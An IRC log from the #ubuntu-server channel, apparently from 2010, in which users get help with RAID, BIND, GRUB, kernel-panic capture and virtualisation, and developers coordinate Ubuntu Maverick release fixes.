<_Techie_> twb, http://xkcd.com/378/
<rebirth> my system is not going to be a server btw, i'm just developing on it
<twb> _Techie_: unfortunately Emacs' BUTTERFLY function is currently buggy
<_Techie_> twb, good thing i use nano then
<twb> _Techie_: http://code.haskell.org/~twb/Preferences/.nanorc (re syntax highlighting)
<rebirth> i'm installing emacs
<twb> http://emacsbugs.donarmstrong.com/4644 (re butterfly)
<rebirth> what is butterfly?
<_Techie_> twb, thankyou, you just made my day
<twb> rebirth: an alleged joke
<twb> Since cho seems to be AWOL again, try alioth: http://alioth.debian.org/~twb-guest/Preferences/.nanorc
<_ruben> speaking of awol ;)
<kinygos> i have something of a noob question....i used easy_install to install django, but i've heard from many sources that easy_install is baaaaad....easy_install put django into python2.6/dist-packages....which seems to be a ubuntu/debian thing cos normally packages go in site-packages....
<kinygos> i will be manually installing this time, so my question is...should i install all my packages in dist-packages or site-packages?
<ttx> smoser: i'm here now
<alvin> How can I tell grub2 that I want it installed in /dev/sda2 permanently? (So, that it will go there every time there is a kernel update instead of overwriting my MBR)
<alvin> ok, found it. It can simply be done with dpkg-reconfigure
<allartx> hello
<allartx> I'm trying to configure bind and still got this error:
<allartx> rndc: connect failed: 127.0.0.1#953: connection refused
<allartx> in /var/log/daemon.log I don't see any error ...
<allartx> what can be wrong?
<xperia> hello to all. i have just installed on my ubuntu server "php5-geoip" but for some reason i still get the erorr message in my script "Fatal error: Call to undefined function geoip_country_code_by_name". What i need to do additional to get GeoIP in php to work on a ubuntu server ?
<kinygos> apologies for the noob question, but i cannot find an answer that doesn't baffle me online....i have just upgraded a ubuntu 9.04 server to 10.04...the server has 2 physical hard drives so i'd like to install RAID1...is this possible, or do i need to rebuild the server?
<xperia> wanted tell only that i solved the problem
<pmatulis> kinygos: upgraded from 9.04 to 10.04?
<kinygos> pmatulis: i went from 9.04 to 9.10 then to 10.04
<kinygos> it didn't have RAID configured..i don't think the second drive is even mounted, but i can see it with fdisk -l
<kinygos> is it possible to create disk partitions once the operating system has been installed?
<pmatulis> kinygos: no, creating a RAID array is a destructive process
<pmatulis> kinygos: the array is like a device in itself (ex: /dev/md0 for software RAID)
<_ruben> it is possible however to convert an installed system from non-raid to raid, its not quite trivial though ;)
<pmatulis> _ruben: i would like to hear about that
<_ruben> pmatulis: long story short: use the 2nd drive to build a degraded raid array with the partition of your likings, copy data from 1st disk to raid, fix bootloader to boot from new disk, if everything works, repartition the 1st disk and add it the array for rebuilding
<kinygos> _ruben: that makes sense...if i have no data to salvage (this is a brand new server)...is there a simpler way?
<_ruben> kinygos: no data to salvage on either disk?
<kinygos> i don't have any access to external media either (such as cd-rom or network drive)
<kinygos> _ruben: no data at all
<twb> dnsmasq is mysteriously failing for me.
<_ruben> then why did you bother to upgrade the box in the first place, could've just reinstalled it
<twb> I've instructed it to serve DHCP on several interfaces, but it's not reporting any DHCP requests in syslog
<twb> Further, ss (netstat) reports that it's only bound to *:domain, and NOT to *:bootps
<kinygos> i have no external media...nowhere to store the .iso file
<_ruben> then again, without external media, that can be troubleshome
<_ruben> -h
<_ruben> also, the "story" i outlined above, is kinda tricky without exernal media (no option to boot a recovery cd when you bust your bootloader)
<kinygos> you've got me thinking about whether i could install 10.04 on the second drive and make that bootable....and if so, whether i can prepare the partitions on that disk for configuring RAID across to the initial drive on reboot
<kinygos> the sales guy from the hosting company said it was easy to set up RAID on 9.04...how foolish do i feel for accepting what a salesman has said???
<twb> kinygos: md, fake or hardware RAID?
<kinygos> i was hoping for md
<twb> md RAID is easy to set up in d-i in 8.04, at least.
<kinygos> d-i?
<twb> It'd probably be substantially harder if you're working from an already-installed, non-raided disk
<twb> kinygos: d-i is the installer on the Ubuntu Server and Alternate CDs
<kinygos> twb: ah ok...i'm currently investigating the feasibility of a fresh install of 10.04 on the second physical disk....
<kinygos> twb: unfortuntaley the server comes pre-installed with 9.04 :(
<kinygos> (serious typing failure there...sorry)
<kinygos> i've come to my senses...i don't know if the second drive is bootable according the server bios :(
<_ruben> buying a server without removable media and not having external removable media around is kinda uhm fail in my book
<kinygos> it's not that...i can get access to a network drive, but it will cost money that my boss doesn't want to pay :(
<_ruben> usb external cdrom drives cost nearly nothing, and thumb drives even less
<kinygos> it's flat-fees from the techs at the hosting company...they want to charge me just to stick a usb stick in the server :(
<_ruben> ah, so the server's remote as well? hope you got an out-of-band management board in it (ilo/drac/ipmi/etc), then again, considering the rest: i doubt it ;)
<twb> kinygos: if you are confident you can get the install correct FIRST TIME, there's a way to blow away (i.e. install to) both disks with md RAID by booting the installer *from the first disk itself*.
<twb> Er, assuming you have access serial or KVM-over-IP or some other management like _ruben mentions.
<twb> (Or you're *really* confident about doing the network part completely blind and one-shot.)
<_ruben> then again, lots of such solutions also offer virtual media allowing you to do whatever you want ;)
<twb> _ruben: I wouldn't know -- I only get the really horrible setups :-P
<ttx> smoser: looks like the incredible cjwatson fixed it
<kinygos> i have KVM-over-IP....i'm on the phone to the ISP asking if the second drive is bootable...he still wants money just to give me access to some external disk space
<twb> cjwatson is just about the best feature of Ubuntu
<_ruben> twb: kinda the samehere , but idrac's are getting ordered more or less by default now ;)
<twb> kinygos: OK, so what you do is download the d-i netinst kernel and ramdisk and put them in /boot, and tell grub about them
<twb> kinygos: then, reboot, and in your KVM-over-IP UI, pick d-i, and then you are into a normal netinst and neither disk is mounted, so you can install to both.
<smoser> yes, super watson to the rescue
<kinygos> twb: awesome, i will give that a shot...thank you and _ruben very much for your time...really appreciate it
<twb> kinygos: one moment and I'll give you the URLs, since you'll probably pick the wrong ones otherwise
<kinygos> :) i was just trying to find them
<twb> http://archive.ubuntu.com/ubuntu/dists/lucid/main/installer-amd64/current/images/netboot/ubuntu-installer/amd64/linux and .../initrd.img
<twb> Er, and .../initrd.gz
<twb> Swap "lucid" and "amd64" to taste.
<kinygos> lucid and amd64 are perfect....again, thank you very much :)
<zul> ttx: lemme check to see if im not crazy
<ttx> zul: you still want to have a shot at samba maverick bugs, post-RC ?
<zul> ttx: i think so...if they are sane
<ttx> no mention of the signon assistant fix in changelog
<zul> ttx: yeah i think i might have gone a bit crazy
<twb> Vaguely apropos of samba --- can one talk SMB2 (instead of CIFS) between samba server and samba guest in a homogeneous lucid network?
<zul> ttx: i cant reproduce the samba upstart nmbd bug though and i would like to get the sign-on bug fixed for maverick
<zul> twb: you need a newer version of samba like samba 4 or 3.5
<ttx> zul: ok, please prepare select fix, upload after RC
<zul> ttx: ack
<twb> zul: so I guess you can, but it isn't production-ready?
<zul> twb: samba 4 isnt
<cjwatson> heh, thanks for the compliments :)
<cjwatson> currently trying to fix bug 569900.  I have the exact same size disk in my image but can't seem to quite reproduce the installer setting the wrong size
<uvirtbot> Launchpad bug 569900 in mdadm "mount: mounting /dev/md0 on /root/ failed: Invalid argument" [High,Confirmed] https://launchpad.net/bugs/569900
 * cjwatson tries lucid just in case
<kinygos> is it safe to just edit /boot/grub/menu.lst (i have grub version 0.98 as i upgraded from 9.04)
<twb> kinygos: yes, since you're about to destroy all of /boot
<zul> ttx: i did the apache sru for the a2enmod modreqtimeout || true fyi
<ttx> zul: cool
<_ruben> joy .. my local repository mirror + personal repo server got its disk (vmware esxi .vmdk) suffer some corruption .. time to figure out how i'll be able to salvage as much data as possible
<raubvogel> AIDE question: if you do aide.wrapper -i, shoudln't it create a new aide.db?
<raubvogel> or copy aide.db.new to aide.db?
<awanti_> how do i login in GUI mode in Ubuntu server
<joschi> awanti_: usually you don't
<twb> awanti_: the server does not include a GUI by default, and we recommend you do not install one.
<raubvogel> awanti_: did you add the gui stuff?
<joschi> awanti_: the default package selection doesn't include an x-server
<awanti_> may i ask you why we don't install gui?
<joschi> awanti_: because it's usually not needed on a server system
<zoopster> awanti_: why do you want a gui on a server?
<zoopster> awanti_: it's a waste of resources, no?
<zoopster> awanti_: if you would like a gui, use Ubuntu Desktop instead
<awanti_> yes your right. But i am comparing to RHEL.
<twb> zoopster: because more code = more potential vulnerabilities
<twb> RHEL only does it because they're marketing to Windows weenies, who can't comprehend a system without a GUI
<twb> (Sorry, bad completion there.)
<jmitchell> why would my virtual network interface vanished after apt-get upgrade just now, how can I repair this?
<awanti_> ok i have one more question... I want install the packages offline. instead of downloading can i use download Server cd image
<twb> jmitchell: what provided the virtual network interface?
<raubvogel> awanti_: all my servers, be them AIX or Solaris or freebsd or ubuntu or gentoo, are in a server room. They might be machines on their own but could also be vms. When I work on them I simply ssh to them and do my thing. Adding X to that just means more bandwidth I could be using for something else.
<twb> awanti_: just aptitude install --download-only while online, then rerun it without that option later
<jmitchell> a physical interface
<jmitchell> twb, physical interface was bridged to the virtual one
<twb> jmitchell: so it's defined in /etc/network/interfaces?
<jmitchell> twb, i'm running hyper-v as the hyperviser
<jmitchell> twn seth0 was and still is defined yes
<jmitchell> however the if does not come up
<jmitchell> odd
<twb> Isn't hyper-v a Windows thing?
<jmitchell> correct
<twb> That part's out-of-scope for me, then
<twb> But pastebin your interfaces(5) file
<jmitchell> ok, 1sec
<awanti_> ok can i use that OS Ubuntu server image for installing other application which i missed during installation time
<jmitchell> twb, fek... cant copy and paste
<jmitchell> it's just auto seth0
<_ruben> awanti_: maybe, the online repositories offer waaay more packages than the cd has to offer
<twb> There should also be an "iface seth0 inet dhcp" or so
<jmitchell>  and iface seth0 inet dhcp
<twb> OK, then I have no idea what went wrong
<_ruben> awanti_: in /etc/apt/sources.list there's probably a commented line referring to your cd
<jmitchell> soz, was typing still
<jmitchell> twb, a fresh install and it works
<jmitchell> twb, do the upgrade and bleh
<jmitchell> and without the upgrade the vm is unstable
<jmitchell> wtf, vmware here i come
<jmitchell> screw this
<jmitchell> twb, thanks for your time anyways ;)
<raubvogel> awanti_, if your installation was complete enough to allow the server to go online, just add the other packages using aptitude or apt-get.
<twb> no worries
<raubvogel> I usually do a basic server install + openssh.
<jmitchell> twb, no clone option for vm's in hyper-v... it's just insane... :(
<twb> You'd have to go out of your way to get a system that can't get a netboot post-install.
<jmitchell> well, i was thinking netboot
<twb> jmitchell: personally I'd prefer a jail to a VM
<jmitchell> but why... seems like reinventing the wheel for something that should be easy
<twb> Oops, s/netboot/network/
<jmitchell> chrooted jail?
<twb> chroots have virtual filesystems.  jails also have virtual network stack and process trees and other cgroupy things.
<twb> But they share a kernel with the host OS, so syscalls are still really fast
<jmitchell> i feel like a noob twb, never heard of jails
<twb> Well, FreeBSD calls them jails
<twb> Solaris calls them zones
<raubvogel> twb: I would think a zone is more than a jail
<jmitchell> will do some reading maybe i can find a better way to do what i need
<twb> In linux they're vserver or openvz/virtuozzo or lxc
<twb> raubvogel: I'm hand-waving the details
<jmitchell> mucho thanko ;)
<raubvogel> twb: gotcha :D
<twb> raubvogel: suffice to say they're trivially circumventable like a chroot, but they're an order of magnitude more efficient than hardware vm
<twb> That is, the class including jails and zones and what have you
<raubvogel> twb, how would you circumvent a jail? I always thought the entire idea for it was to make it harder to do that.
<twb> Sorry, I meant "they're NOT trivially ..."
<raubvogel> You scared me there ;)
<twb> It's 0023 hours here
<jmitchell> twb, sounds about right
<jmitchell> and if u'r work isnt done by 2mrw U"R FIRED
<raubvogel> Over here where lovebugs are our state bird, it is 10:25
<jmitchell> i'm in the crime center of the world, south africa
<jmitchell> 4:24pm here
<jmitchell> it's nice and sunny here though, gonna go mountain biking in 34min and counting :)
<raubvogel> jmitchell, I crashed last night at 2am trying to do some work. Just to get up at 6 again.
<smoser> ttx, what do you think of https://bugs.launchpad.net/bugs/649833
<raubvogel> Very nice!
<uvirtbot> Launchpad bug 649833 in cloud-init "uec images motd suggests tasksel, but tasksel not installed" [Undecided,New]
<raubvogel> Anyone uses AIDE?
<ttx> smoser: looking
<jmitchell> raubvogel, we have just finnished a huge project and every1 is in chilled mode :D
<jmitchell> raubvogel, AIDE?
<ttx> smoser: since when do you think we don't have tasksel ?
<raubvogel> jmitchell, http://sourceforge.net/projects/aide/
 * jmitchell sniffs at the url
<ttx> smoser: in other words, does this affect lucid as well ?
<smoser> $ sudo tasksel --section server
<smoser> sudo: tasksel: command not found
<smoser> i dont know
<raubvogel> Intrusion detection
<smoser> checking
<jmitchell> no need for that anymore, i just use mikrotik and it's handy torch feature, scripting and firewalls take care of the rest
<raubvogel> IMHO, kinda useless because it only checks for changed stuff once a day. OSSEC seems to be more active
<smoser> ttx, lucid does have it: http://uec-images.ubuntu.com/releases/lucid/release-20100923/ubuntu-10.04-server-uec-amd64.manifest
<raubvogel> I am also using fail2ban for the firewall stuff
<jmitchell> i like that u can teach fail2ban
<ttx> smoser: so I think we should fix the seed
<jmitchell> it's looking after my bind9 too
<raubvogel> Agreed
<ttx> smoser: I'll comment to that effect
<jmitchell> stopping twits from doing spoofed . lookups
<ttx> smoser: ideally, before we generate the RC cloud images
<raubvogel> Agreed.
<raubvogel> Meeting. BBL
<jmitchell> ciao, nice chatting
<smoser> ttx, so which of these two bugs do you think i was alluding to yesterday (when i said i knew of some, but wasn't telling)
<smoser> :)
<raubvogel> I... need... lots... of... coffee
<jmitchell> i have a biiiig mug in front of me now too :)
<ttx> smoser: we have a specific seed for cloud images ?
<smoser> yes.
<smoser> http://bazaar.launchpad.net/~ubuntu-core-dev/ubuntu-seeds/ubuntu.maverick/annotate/head%3A/uec
 * ttx wonders when that was booted off
<smoser> some other dependency probably
<smoser> it was never explicit
 * ttx just doublechecked the server ISO was ok :)
<ttx> smoser: I'm on it
<smoser> well, i just pushed a branch
<smoser> if you want to wait for that
<ttx> ah
<smoser> on its way to lp:~smoser/ubuntu-seeds/ubuntu.maverick.bug649833
<ttx> smoser: merged
<smoser> :)
<smoser> nice
<smoser> before i even proposed
<smoser> how fast to those seed things take affect ?
<smoser> i thiknk some process has to run to update seeds, right ?
<ttx> smoser: no clue, will ask on #ubuntu-release
<ttx> yep
<ttx> germinate
<smoser> whoowhoo. a .4 build today :)
<ttx> smoser: so, it looks like you need to ask for a manual push after the next germinate.cron run, in ~1h, and then trigger a cloud image build
<cjwatson> ttx: I think I have a handle on bug 569900 at last
<uvirtbot> Launchpad bug 569900 in mdadm "mount: mounting /dev/md0 on /root/ failed: Invalid argument" [High,Confirmed] https://launchpad.net/bugs/569900
<ttx> cjwatson: a risky handle ?
<cjwatson> ttx: if I'm right, it's an adjustment to my previous attempt to fix the problem
<cjwatson> simply increasing the chunk of space we ensure is clear at end of disk
<cjwatson> I'm trying to establish a bit more certainty about this though
<hackeron> hey, what would be the best way to catch kernel panics and write them to disk? - linux-crashdump?
<cjwatson> ttx: and, if I'm right, the reason it resisted analysis up to now is that it's very sensitive to the exact size of the disk, and if you use a round number of MiB then you'll never see it ...
<cjwatson> (and my habit involves things like 'kvm-img create -f qcow2 foo.img 10G')
<uvirtbot> New bug: #649930 in vsftpd (main) "package vsftpd 2.2.2-3ubuntu7.1 failed to install/upgrade: ErrorMessage: subprocess installed post-installation script returned error exit status 3" [Undecided,New] https://launchpad.net/bugs/649930
<Vibedigital>  Hi i'm running ubuntu server 10.04 on virtualbox and network is fine samba configured. I can access my www folder ok,but on windows 7 im running html editor nvu when i try to save the page on www it says: "save failed" someone could help?
<hackeron> anyone? what would be the best way to catch kernel panics and write them to disk? - linux-crashdump?
<RoyK> I think the old and well-proven way is a serial console, a panic may cause I/O to fail (intentionally or not)
<hackeron> problem is no physical access to server :(
 * SpamapS recalls his first I.T. job where the SunOS voicemail system had a printer hooked up to the console for just such debugging duties.
<RoyK> hackeron: are there anyone with physical access to it you can call?
<SpamapS> hackeron: there are some very affordable modems that you can purchase that will call you whenever there is activity on their serial port. ;)
<hackeron> RoyK: yeh, to press the power button but I added kernel.panic = 2 to /etc/sysctl.conf so havent needed to ask - just want to know why its kernel panicing every month or so
<SpamapS> heck I bet there are *thousands* just sitting in peoples' closets ;)
<hackeron> RoyK: cant afford downtime so I get the server to reboot asap
<RoyK> ic
<RoyK> and nothing in /var/log/messages?
<hackeron> I think it's the dvr card thats causing it so it wont affect IO I dont think
<RoyK> iirc linux will log a panic to syslog if it can
<SpamapS> hackeron: if you can't afford downtime, you should have a remote console of some sort hooked up so you can read those dumps.
<SpamapS> lol.. a DVR that can't afford downtime? ;)
<RoyK> hackeron: have you tried to enable syslogging to another host?
<hackeron> RoyK: hmm? - I've never had a panic logged to syslog, even when I cause one
<hackeron> SpamapS: it's a CCTV DVR - I just get the server to reboot
<RoyK> hackeron: I may be thinking of OOPSes - they usually go to the syslog
<hackeron> RoyK: yeh, I have kernel.panic_on_oops = 1 so they dont
<RoyK> hackeron: but if you can call someone, mail them a null modem cable and ask them to connect a cable to somewhere else from where you can access it - or even - configure a network console to some box
<RoyK> !network console
<RoyK> dumb bot
<RoyK> !network console is https://help.ubuntu.com/community/Installation/NetworkConsole
<ubottu> Error: I am only a bot, please don't think I'm intelligent :)
<RoyK> ubottu: network console is https://help.ubuntu.com/community/Installation/NetworkConsole
<ubottu> Error: I am only a bot, please don't think I'm intelligent :)
<cjwatson> serial consoles are good for this kind of thing, yes
<RoyK> fsck
<hackeron> I will look into network console, thanks - but anything I can do at all with software?
<cjwatson> RoyK: I doubt it likes the factoid name being multiple words
<RoyK> !networkconsole
<RoyK> ubottu: networkconsole is https://help.ubuntu.com/community/Installation/NetworkConsole
<cjwatson> the purpose of linux-crashdump is for this kind of thing, yes
<cjwatson> it's a more complex pile of stuff and therefore more prone to failure
<cjwatson> (just by immutable natural laws)
<cjwatson> hackeron: https://wiki.ubuntu.com/Kernel/CrashdumpRecipe may help you
<cjwatson> analysing the results can be a bit challenging though
<hackeron> cjwatson: yeh I get that but if it's a hardware fault chances are a serial console wont work anyway if the box cant reboot itself, and if it can reboot itself, surely there's a way to log the panic?
<cjwatson> you don't just get the panic, you get a complete dump of memory state
<cjwatson> panics get written to serial console very reliably, IME
<cjwatson> filesystem I/O is SIGNIFICANTLY more complicated than rebooting
<cjwatson> or than writing to a console (serial or otherwise)
<cjwatson> writing to a filesystem in a panicked state is really not a good plan
<cjwatson> either some kind of console arrangement or linux-crashdump is likely to be the best you'll get
<hackeron> cjwatson: hmm seems to work on mac and windows - get a nice report problem dialog on reboot with the panic -- I understand it won't work every time, but it's something I'd like to try :)
<cjwatson> linux-crashdump (LKCD) is a lot simpler than filesystem I/O - it basically dumps memory state to the swap partition, which is retrieved afterwards
<cjwatson> hackeron: linux-crashdump is the best building block for this you are likely to get
<hackeron> I suspect the panic is coming from a v4l driver so dont think thst would affect filesystem IO?
<cjwatson> EOT
<hackeron> cjwatson: ok, cool - seems last release was 2005 though - it still works?
<cjwatson> see the wiki page I gave you earlier
<hackeron> cjwatson: yeh no mention of maverick ther
<hackeron> cjwatson: and says problems even in lucid with apport
<cjwatson> sure, those are relatively minor problems as I understand it
<hackeron> cjwatson: tried it, installed, rebooted, then ran 'echo c > /proc/sysrq-trigger' - system rebooted, nothing in /var/crash
<hackeron> cjwatson: any ideas?
<cjwatson> sorry, no
<cjwatson> I have to withdraw from this conversation now - I intended to just provide quick pointers, I'm afraid I don't have enough time to get involved in details
<hackeron> cjwatson: ok, thanks, I'll ask on ubuntu+1
<goldcove> Ubuntu JeOS, I'm unable to get programs that segfaults to produce core dumps. I've tried to "ulimit -c unlimited", but this does not come into effect as coredump is stuck at 0. Is there a way to fix this?
<uvirtbot> New bug: #650439 in mysql-dfsg-5.1 (main) "package mysql-server-5.1 5.1.37-1ubuntu5.4 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/650439
<RoyK> hi all. from ps -ef, I get 'cassiani 23637     1 33 17:40 ?        00:23:45 ./flexpart80_average_yy.exe' - is there a way to find the full path of the file running?
<Laverne> RoyK: try "ls -l /proc/23637/cwd"
<RoyK> Laverne: thanks - I found it
<Laverne> your welcome
<Ganymede> Hi, I'm not sure if this is more a question for #ubuntu or #ubuntu-server but I have a headless machine that users use VNC/NX to connect to, sort of like a terminal server with a GNOME session for users. Since this is a shared machine, I want to disallow users from restarting the machine from GNOME. How do I remove this ability from GNOME session users?
<uvirtbot> New bug: #650443 in mysql-dfsg-5.1 (main) "package mysql-server-5.1 5.1.41-3ubuntu12.6 failed to install/upgrade: subprocess new pre-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/650443
<uvirtbot> New bug: #650446 in eucalyptus (main) "Cloud exhausting Permanent Generation space" [Undecided,New] https://launchpad.net/bugs/650446
<patdk-wk> heh? don't you have to have root permisions to restart?
<thenthenio> Hello, on ubuntu server 8.04 how to run the setup script (the one that lets you choose which servers to install) from prompt?
<RoyK> dselect?
<thenthenio> No, theres a ncurser selections that is available during install...
<thenthenio> *ncurses
<Ganymede> patdk-wk: Apparently not when NX/VNC spawns a session using /etc/X11/xinitrc or something like that. There is a restart button but I'm scared to test it out to see if it works.
<patdk-wk> https://answers.launchpad.net/ubuntu/+question/83825
<Ganymede> patdk-wk: Thanks, I'm looking at it. Most of those solutions are about removing the entries from the GNOME panel but users would still get a prompt to restart the machine after updates, right? So I'm looking at policykit-gnome but the instructions seem to not apply to me.
<patdk-wk> heh? upgrades wouldn't touch that
<Ganymede> I mean, after doing a dist-upgrade, users get a prompt when you log in, "This machine needs to be restarted. Restart now/restart later". I'm assuming they get this regardless of whether the buttons are there in the panel applet. So I'm trying to forbid it through policykit.
<SpamapS> ttx: http://people.canonical.com/~pitti/workitems/maverick/canonical-server.html ???
<hggdh> kim0: there (#ubuntu is too confused...)
<classical> hello ppl please someone help me with bind9   i have rndc issue i have run rndc-confgen and updated both named.conf and rndc.conf file the key is same but i have this error: http://pastebin.com/hZV5TAH8
<classical> Im sick fixing this error i really need some help :-)
<ttx> SpamapS: nice, next time we should aim for rainbow colors
<SpamapS> ttx: blue is too calming to motivate us
<ttx> SpamapS: hopefully the next db run will fix it
<ttx> SpamapS: it was ok a few hours ago
<kim0> hggdh: ping ? you needed something ?
<hggdh> kim0: after the server meeting, if you do not mind
<kim0> hggdh: sure
<AndyGraybeal> is it possible to do both usermod networking and bridge mode networking at the same time?
<AndyGraybeal> *usermode
<|rt|> hey guys I just got a new server that's using a brand new areca raid controller which the built in driver fails to detect....so I downloaded and compiled the driver source from areca on another box and put the ko file on a usb stick...but in the installer when I tell it to look on removable media for the driver its still not working
<AndyGraybeal> with libvirt
<|rt|> could it be b/c the kernel version is different on the install cd compared to the server I built the driver on?
<|rt|> there's no errors that give me any clues in dmesg
<JavaAtom> Back for a quick sanity check:
<JavaAtom> Does the ubuntu bootloader still have problems booting from a Raid-5?
<|rt|> assuming your talking about md raid boot has to be on raid0 or raid1
<JavaAtom> ah shazbot.
<_ruben> i always use a small raid1 array for /boot
<JavaAtom> I assume I can take a little sliver out of my raid-5 for that?
<_ruben> wasnt even aware of the raid5 issue, im used to doing that because of lvm ;)
<JavaAtom> 100MB from each drive or something ridiculously small?
<_ruben> 100MB should be plenty
<_ruben> i tend to do 128MB due to its power of 2 ;)
<|rt|> 100MB works...all depends on how many copies of the older kernels you want to keep around
<|rt|> _ruben: I do the same thing
<JavaAtom> Right -- so I'd have a raid-1 running /boot, 128MB in size, then another Raid-5 many terrabytes in size.
<_ruben> JavaAtom: that's how i do, scratch that, did it ;)
<JavaAtom> gotcha
<JavaAtom> _ruben: Much appreciated sir.
<_ruben> no my / including /boot is on a 2G flashdisk ;)
<_ruben> s/no/now/
<JavaAtom> heh.
<JavaAtom> I'd do that, but I've already capped the SATA connections on this box.
<JavaAtom> and it has enough of a time booting what I've got.
<_ruben> the flashdisk is pata ;)
<JavaAtom> heh
<JavaAtom> No reason not to do it later.
<JavaAtom> Thanks
<_ruben> doesnt even have a cable, the disk sits in the connector
<JavaAtom> heh. That's pretty sweet.
<_ruben> (does have a (tiny) power cable obviously)
<JavaAtom> << runs off to install server.
<_ruben> though with default -server installs, 2G tends to be just enough, gets tricky with full version upgrades though
<kim0> smoser: Any link with more info on the pv-grub feature ?
<kim0> hggdh: so did you need something ?
<hggdh> kim0: yes, I will PM you
<smoser> kim0, yes.
<kim0> smoser: is there any other major cloud related feature to maverick (besides cloud-{init,utils}) ?
<smoser> http://aws.typepad.com/aws/2010/07/use-your-own-kernel-with-amazon-ec2.html
<smoser> i'd say some improvements in cloud-init (and acceptance of cloud-init into amazon ami)
<smoser> plus the use of pv-grub
<kim0> sounds great :)
<smoser> and our images also can service their own kernels on uec
<kim0> thanks man
<RoAkSoAx> jjohansen: what's the best linux kernel book in your opinion?
<jjohansen> uhmm, depends
<jjohansen> ldd3 is fair but its not a good intro
<RoAkSoAx> jjohansen: right now i'm uising LInux Kernel development by Robert Love (google employee)
<jjohansen> I always found robert loves book a better read, better introduction but its getting old
<jjohansen> yeah, its good but quite old
<RoAkSoAx> jjohansen: is there something better?
<jjohansen> hrmmm, not that I know of but I really haven't been looking
<RoAkSoAx> jjohansen: alright thanks :)
<jjohansen> I heard a rumor he was updating his book though
<RoAkSoAx> cool :)
<|rt|> anyone ever had to use external media for a raid controller during installation?
<RoAkSoAx> jjohansen: btw.. the update you talking about would be the 4th edition right, since the 3erd was published july this year and thtat;s the one im using
<|rt|> or know if there's any instructions on how to do that anywhere
<jjohansen> ah, no I didn't know the 3rd had been published
<jjohansen> I haven't looked since hrmm, about a year ago at ALF
<spat> resolving DNS is really slow when the primary dns is down (probably because it keeps attempting to use the primary for seconds with every query) is there a way to speed things up?
<RoAkSoAx> jjohansen: oh ok :) we are using this book for a course actually and it is pretty good
<jjohansen> yeah, it is the best of the one I have read, my only complaint was that it was getting dated
<jjohansen> but so is ldd3
 * RoyK really needs zfs
<RoAkSoAx> jjohansen: :) Thanks for the input btw :)
 * RoyK has an old server named fenris at work, dual 360MHz SPARC on sol8
<spat> never mind found the timout:n option :)
<classical> here is my rndc.conf : http://pastebin.com/zwa6QbBp  and here is my my rndc.key source http://pastebin.com/P5Mrfwac
<classical> and this is in my named.conf :  http://pastebin.com/HygjiMyv
<classical> and  rndc -c /var/chroot/named/etc/bind/rndc.conf -s 127.0.0.1 -p 953 status
<classical> prints this error http://pastebin.com/k21gYQ4M   please help me figure out whats wrong
<smoser> alright. 20100928.4 build for uec images started. a new high number for .X  for me.
<ttx> mathiaz: the print-server task fails, see bug 650566
<uvirtbot> Launchpad bug 650566 in foomatic-db-engine "print-server task is not installable on Maverick RC" [High,Confirmed] https://launchpad.net/bugs/650566
<ttx> mathiaz: If you ack me, I'll commit the seed fix.
<ttx> mathiaz: then we can wait for euca to hit, and ask for a respin.
<AndyGraybeal> how do i build a virtual machine with two network interfaces?
<AndyGraybeal> can i bridge both of them?
<ttx> mathiaz: got acked from Colin, so that's done
<ttx> mathiaz: now the idea would be to trigger a respin when euca is uploaded and published, and when the seed is ready
 * mathiaz nods
<mathiaz> ttx: I'll sponsor eucalyptus
<pwnguin> # Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
<pwnguin> #     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
<overlord_tm> Is there any other way to alter VM than undefining it in virsh and then importing modified xml?
<pwnguin> anyone know how to set nameservers in this newfangled dynamic resolv.conf world?
<_ruben> pwnguin: uninstall resolvconf and edit that file anyway? ;) or figure out how to influence resolvconf(8)
<pwnguin> heh
<scrllock> does anyone know which kernel versions include pv-on-hvm drivers?
<scrllock> if any
<soren> scrllock: You mean virtio?
<mathiaz> ttx: Daviey: eucalytpus ubuntu4 sponsored to maverick
<scrllock> soren: no, one with the CONFIG_XEN_PVHVM=y
<pedahzur> So, I'm having trouble with cron.  It's somewhat related to this bug: https://bugs.launchpad.net/ubuntu/+source/upstart/+bug/592114 but not quite the same symptoms.  Cron starts at boot, but will not run the user cron jobs, even after editing or touching, until I restart cron after boot.  Has anyone seen anything like this?
<scrllock> option
<ttx> mathiaz: I'm about to stop
<uvirtbot> Launchpad bug 592114 in upstart "upstart doesn't start cron automatically on boot in lucid for server on amd64" [Undecided,New]
<mathiaz> ttx: ok - with whom should I talk to get an iso respin?
<mathiaz> ttx: just ask in #ubuntu-release?
<ttx> mathiaz: yes
<ttx> mathiaz: not sure who will be up at that point
<ttx> you need to wait for build/publication
<ttx> that should take a couple hours
 * mathiaz nods
<apw> scrllock, that option is not even present in the default kernels
<scrllock> apw: yeah, that's why i was asking in -kernel
<scrllock> it's in the mainline 2.6.36-rcX, but that kernel is a bit too buggy
<_ruben> pwnguin: the manpage seems pretty decent though ;)
<pwnguin> _ruben: i ended up just removing resolvconf =|
<_ruben> pwnguin: probably the easiest "solution" ;)
<_ruben> must i prefer to be in control of my config files myself as well
<_ruben> +admit
<Daviey> mathiaz, thanks
<cemc> is there a package that contains dos2unix/unix2dos on 10.04 ?
<cemc> found it, tofrodos
<cemc> to Frodo's ;)
<SpamapS> we go
<SpamapS> :)
<illytacos> hey folks, what is the best way to do exactly what active directory can do? thanks!!!
<illytacos> in ubuntu server 10.04 sorry
<|rt|> I need to supply a driver for my raid controller to the installer.  do I need to compile the module against the headers for the kernel version on the install cd or would the newest server headers work?  b/c when I go to load the module I get an error saying it's not a valid module format
<|rt|> illytacos: the easiest way is to use a windows server with AD
<illytacos> lol I don;t have a windows server
<|rt|> illytacos: AD does a lot of things.  Basically it's a ldap, kerbose, and dns mash up
<|rt|> so you can approximate most of it's functionality using those protocols...but it's a pretty daunting task as each of those are things are pretty deep subjects
<SpamapS> Personally I think thats something that most corporate/large organizations find daunting about Linux migration. That they actually have to setup krb/ldap/dns instead of just installing a server and going forward.
<SpamapS> Samba 4 is still alpha.. wow.. its been years. :-P
<overlord_tm> does ubuntu has its own virtio drivers for win 2k3, or do i have to use red hat's?
#ubuntu-server 2010-09-29
<uvirtbot> New bug: #650721 in bind9 (main) "dnssec-keygen hangs" [Undecided,New] https://launchpad.net/bugs/650721
<SpamapS> oh nice.. maverick 32 bit vm doesn't even show plymouth
<SpamapS> barely flashed on before the login prompt showed up
